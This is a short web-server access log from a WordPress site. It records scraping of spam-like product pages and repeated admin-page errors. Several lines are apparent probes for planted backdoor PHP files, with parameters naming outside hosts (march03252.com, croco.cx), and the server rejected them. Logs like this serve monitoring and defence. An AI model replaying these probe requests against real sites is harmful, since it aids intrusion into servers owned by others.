185.177.72.13 - - [16/Jun/2026:22:51:02 +0000] "GET /welcome-to-the-vapor-shoppes-exclusive-collection-of-e-liquid/ HTTP/1.1" 200 23334 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:51:02 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:51:03 +0000] "GET /a-lot-of-individuals-would-love-the-very-best-brands/ HTTP/1.1" 200 23319 "-" "curl/8.7.1"
156.230.188.66 - - [16/Jun/2026:22:51:03 +0000] "GET /wp-includes/theme-templates-library.php?ajax-response=march03252.com/readme HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
172.233.77.10 - - [16/Jun/2026:22:51:03 +0000] "GET /wp-includes/class-smtp-method.php?merge=croco.cx/3 HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E)"
185.177.72.13 - - [16/Jun/2026:22:51:03 +0000] "GET /below-are-the-detailed-comparison-charts-of-different-grades/ HTTP/1.1" 200 23105 "-" "curl/8.7.1"
94.103.84.74 - - [16/Jun/2026:22:51:04 +0000] "GET /wp-admin/plugins.php HTTP/1.1" 500 2859 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
185.177.72.13 - - [16/Jun/2026:22:51:04 +0000] "GET /187-factory-is-widely-thought-about-the-best-for-chanel/ HTTP/1.1" 200 23395 "-" "curl/8.7.1"
185.177.72.13 - - [16/Jun/2026:22:51:05 +0000] "GET /in-2026-the-posh-style-market-has-reached-a-breaking-level/ HTTP/1.1" 200 23079 "-" "curl/8.7.1"
110.136.6.234 - - [16/Jun/2026:22:51:05 +0000] "GET /wp-includes/theme-templates-library.php?ajax-response=march03252.com/readme HTTP/1.1" 403 193 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office)"
